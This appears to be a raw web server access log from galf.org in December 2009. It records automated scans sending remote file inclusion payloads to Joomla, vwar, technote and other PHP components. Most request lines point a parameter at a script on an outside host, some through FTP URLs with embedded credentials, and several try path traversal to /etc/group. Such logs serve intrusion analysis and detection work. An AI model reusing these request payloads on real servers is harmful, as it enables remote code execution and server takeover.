210.127.253.75 - - [20/Dec/2009:22:41:44 -0800] "GET /logs/access_091130.log//components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [20/Dec/2009:22:41:44 -0800] "GET /logs//components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [20/Dec/2009:22:41:44 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:41:46 -0800] "GET /logs/access_090921.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:42:23 -0800] "GET /logs/access_090928.log%20%20/?_SERVER%5BDOCUMENT_ROOT%5D=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:42:23 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:42:23 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:42:56 -0800] "GET /logs/access_090928.log/?_SERVER%5BDOCUMENT_ROOT%5D=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:42:56 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.833" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:42:57 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.833" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:22:43:04 -0800] "GET /logs/access_090706.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:22:43:04 -0800] "GET /logs/access_090706.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:43:55 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:43:55 -0800] "GET /logs/access_090608.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:43:55 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:44:03 -0800] "GET /logs/access_090921.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:44:15 -0800] "GET /logs/access_090921.log/?_SERVER%5BDOCUMENT_ROOT%5D=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.227.193.199 - - [20/Dec/2009:22:44:21 -0800] "GET /logs/access_090928.log/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
58.227.193.199 - - [20/Dec/2009:22:44:21 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
58.227.193.199 - - [20/Dec/2009:22:44:22 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.75 - - [20/Dec/2009:22:44:36 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [20/Dec/2009:22:44:36 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.826" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:45:29 -0800] "GET /logs/access_090928.log/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:46:18 -0800] "GET /logs/access_090921.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:46:39 -0800] "GET /logs/access_090928.log%20/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:47:31 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.142.120.149 - - [20/Dec/2009:22:47:44 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.253.75 - - [20/Dec/2009:22:48:03 -0800] "GET /logs/access_090928.log/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:48:24 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:48:34 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.227.193.199 - - [20/Dec/2009:22:49:04 -0800] "GET /logs/access_090928.log%20/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.75 - - [20/Dec/2009:22:49:12 -0800] "GET /logs/access_090928.log%20/?_SERVER%5BDOCUMENT_ROOT%5D=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:55:38 -0800] "GET /?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:55:38 -0800] "GET /logs/access_090914.log%20%20/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:55:38 -0800] "GET /logs/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:55:52 -0800] "GET /vwar/backup/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:55:52 -0800] "GET /logs//vwar/backup/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:55:52 -0800] "GET /logs/access_090921.log//vwar/backup/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:56:04 -0800] "GET /logs/access_091123.log%20%20/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:56:35 -0800] "GET /logs/access_090914.log/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:56:35 -0800] "GET /?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:56:35 -0800] "GET /logs/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:56:46 -0800] "GET /logs/access_091123.log/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:57:02 -0800] "GET /logs/access_090706.log/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:57:02 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:57:02 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:58:52 -0800] "GET /logs/access_090706.log//vwar/backup/errors.php?error=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:19 -0800] "GET /logs/access_090914.log/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:20 -0800] "GET /logs/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:20 -0800] "GET /index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:31 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:32 -0800] "GET /index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:59:32 -0800] "GET /logs/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:59:33 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:59:33 -0800] "GET /logs/access_090706.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [20/Dec/2009:22:59:33 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:55 -0800] "GET /index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:55 -0800] "GET /logs/access_090831.log/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:55 -0800] "GET /logs/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:55 -0800] "GET /logs/access_090803.log/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:57 -0800] "GET /index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:57 -0800] "GET /logs/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:57 -0800] "GET /logs/access_090803.log/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:59:57 -0800] "GET /logs/access_090831.log/index.php?body=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET /logs/access_090713.log////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET /logs/access_090713.log////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:22:59:59 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:04 -0800] "GET /logs/access_090713.log////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:04 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:04 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:23:00:47 -0800] "GET /logs/access_090914.log/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:23:00:47 -0800] "GET /index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:23:00:47 -0800] "GET /logs/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:58 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:58 -0800] "GET /logs/access_090706.log////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:00:58 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:23:01:00 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:01:16 -0800] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:01:17 -0800] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:01:17 -0800] "GET /logs/access.log%20%20///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:01:50 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:01:50 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:01:50 -0800] "GET /logs/access_090706.log////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:23:02:04 -0800] "GET /logs/access_091026.log/index.php?body=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:02:09 -0800] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:02:16 -0800] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:03:27 -0800] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:03:27 -0800] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:03:27 -0800] "GET /logs/access_090706.log%20%20///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:04:15 -0800] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:04:15 -0800] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:04:49 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:04:49 -0800] "GET /logs/access_090525.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:04:49 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:04:58 -0800] "GET /logs/access_090720.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:01 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:01 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:01 -0800] "GET /logs/access_090525.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:08 -0800] "GET /logs////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:08 -0800] "GET ///vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:08 -0800] "GET /logs/access_090525.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:10 -0800] "GET /logs/access_090720.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:05:17 -0800] "GET /logs/access_090720.log%20%20////vwar/backup/errors.php?error=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:23:09:24 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:23:09:24 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:23:09:24 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:23:09:24 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:23:10:42 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.217.5.166 - - [20/Dec/2009:23:10:42 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.217.5.166 - - [20/Dec/2009:23:10:42 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:12:35 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:12:35 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:12:35 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:12:57 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:23:12:57 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:23:12:57 -0800] "GET /logs/access.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:23:12:58 -0800] "GET /logs/access_091109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
